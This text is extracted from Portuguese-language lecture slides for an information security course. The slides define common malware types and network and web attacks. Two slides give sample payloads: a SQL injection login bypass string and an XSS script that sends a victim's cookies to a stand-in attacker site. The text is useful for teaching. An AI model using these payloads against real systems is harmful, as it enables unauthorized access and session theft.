24
Técnico de Manutenção e Suporte em Informática Disciplina - Segurança da Informação Unidade 2 – Malwares e Ataques mais comuns Prof. Leandro Cavalcanti de Almeida [email protected] @leandrocalmeida

Unidade 2 malwares e ataques

Embed Size (px)

Citation preview

Page 1: Unidade 2  malwares e ataques

Técnico de Manutenção e Suporte em Informática Disciplina - Segurança da InformaçãoUnidade 2 – Malwares e Ataques mais comuns

Prof. Leandro Cavalcanti de [email protected]

@leandrocalmeida

Page 2: Unidade 2  malwares e ataques

Malwares

Page 3: Unidade 2  malwares e ataques

Vírus Bot

Worms Rootkits

Backdoors

Spywares

Cavalode

Tróia

Keylogger

Malwares = Software Maliciosos

Page 4: Unidade 2  malwares e ataques

Vírus

VírusTrecho de código, geralmente em assembler, que é injetado dentro de outro aplicativo

Modo de Operação: necessidade de um código hospedeiro para sobreviver e replicar. Necessita da ação do usuário

Page 5: Unidade 2  malwares e ataques

KeyloggerAplicativo voltado para capturar tudo o que se é digitado no teclado

Modo de Operação: aplicativo captura tudo que é digitado e envia de tempos em tempos para o atacante

Keylogger

Page 6: Unidade 2  malwares e ataques

WormAplicativo que realiza escaneamentos na rede em busca de hosts vulneráveis. Não necessita da ação do usuário

Modo de Operação: Se instala e replica entre hosts na rede de forma cíclica

Worms

Page 7: Unidade 2  malwares e ataques

BotRobô, que possui funcionalidades de worms, e fica aguardando a ordem do seu mestre para realizar ataques a outros computadores

Modo de Operação: Após o comando do mestre realiza um DoS em algum outro host na rede

Bot

Page 8: Unidade 2  malwares e ataques

RootKitAplicativo que têm como finalidade permitir acesso privilegiado a um invasor, escondendo seus rastros

Modo de Operação: Geralmente se camufla em outros processos do sistema e abre uma backdoor para acessos remotos não autorizados

Rootkits

Page 9: Unidade 2  malwares e ataques

BackdoorAplicativo que têm como finalidade permitir acesso remoto através da abertura não autorizada de uma porta

Modo de Operação: Geralmente habilitam uma porta alta para acessos não autorizados

Backdoors

Page 10: Unidade 2  malwares e ataques

SpywaresAplicativo que têm como finalidade coletar informações estatísticas dos hosts e enviá-las ao atacante

Modo de Operação: Monitoram processos e conexões de rede e enviam essas informações so atacante

Spywares

Page 11: Unidade 2  malwares e ataques

Cavalo de TróiaPresente de grego camuflado em arquivos como fotos, cartões virtuas, jogos,... que tem funções destrutivas

Modo de Operação: após a vítima baixar o “presente” o trojan instala outro Malware

Cavalode

Tróia

Page 12: Unidade 2  malwares e ataques

Aplicação

Transporte

Rede

Enlace

Físico

AtaquesSql Injection XSS

Buffer OverflowTCP SYN FLOOD UDP FLOOD

Main in the Middle

IP Spoofing ICMP Flooding

ARP Spoofing

MAC Spoofing

STP Attack

ARP Poisoning

Page 13: Unidade 2  malwares e ataques

SQL InjectionEx : Sistema de autenticação em PHP

Imagine se o usuário inserir os dados abaixo...Login: qualquer coisaSenha: ' OR '1'='1

SELECT * FROM usuarios WHERE login='qualquer coisa' AND senha = '' OR '1'='1'

Essa query SQL retornará todos os registros da tabela usuários!

Page 14: Unidade 2  malwares e ataques

XSS Suposição:Facebook vulnerável a Cross-Site Scripting

Insere um código(html, Javascript,...) malicioso no lugar de um post na base de dados do facebook

Usuário ingênuo clica no link...

<script>Document.location = 'http://sitedocracker.com/roubarcokkies.php=' + document.cookie

</script>

Page 15: Unidade 2  malwares e ataques

Buffer Overflow

<script>Document.location = 'http://sitedocracker.com/roubarcokkies.php=' + document.cookie

</script>

char nome[4]; int idade;

L E O \0 2 0Entrada: LEO idade: 20

char nome[4]; int idade;

L E O A \0Entrada: LEOOA idade: 65

O

Page 16: Unidade 2  malwares e ataques

TCP SYN FLOOD

SYN

SYN-ACK

ACK

SYN

SYNSYNSYNSYNSYN

Page 17: Unidade 2  malwares e ataques

UDP FLOOD

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

UDP – porta qualquer

Page 18: Unidade 2  malwares e ataques

Main in the Middle

Packet

Packet

Packet

Packet

Page 19: Unidade 2  malwares e ataques

IP Spoofing Packet

10.0.0.1

10.0.0.254

10.0.0.1

Packet

Packet

Packet

Packet

Atacante envia pacotes IP falsificados para a vítima, se passando por outro host na rede!

Packet

Page 20: Unidade 2  malwares e ataques

ICMP Flooding

ICMP – echo request

ICMP – echo request

ICMP – echo request

ICMP – echo request

ICMP – echo request

ICMP – echo request

Page 21: Unidade 2  malwares e ataques

Spanning Tree Attack

VLAN 1

VLAN 1

VLAN 2VLAN 1 VLAN 2VLAN 3

VLAN 1VLAN 2

Packet

PacketPacketPacket

Packet

Packet

Packet

Packet

PacketPacketPacketPacketPacket

Atacante se torna Root bridge

Page 22: Unidade 2  malwares e ataques

ARP SpoofingPacket

IP: 10.0.0.1MAC: 68:A3:C4:9B:73:54

IP: 10.0.0.254MAC: 52:54:00:69:42:4A

IP: 10.0.0.2MAC:68:A3:C4:9B:73:54

Packet

Packet

Packet

Packet

Atacante envia pacotes ARP falsificados para a vítima, se passando por outro host na rede!

Packet

arpspoof

Page 23: Unidade 2  malwares e ataques

ARP Poisoning

IP: 10.0.0.1MAC:68:A3:C4:9B:73:54

IP: 10.0.0.254MAC: 52:54:00:69:42:4A

IP: 10.0.0.2MAC: 68:A3:C4:9B:73:54

Packet

1 MAC2 MAC3 MAC4 MAC5 MAC6 MAC

Atacante envenena a tabela ARP do Switch

Page 24: Unidade 2  malwares e ataques

MAC Spoofing Packet

68:A3:C4:9B:73:54

52:54:00:69:42:4A

68:A3:C4:9B:73:54

Packet

Packet

Packet

Packet

Atacante envia pacotes com endereço MAC falsificado para a vítima, se passando por outro host na rede!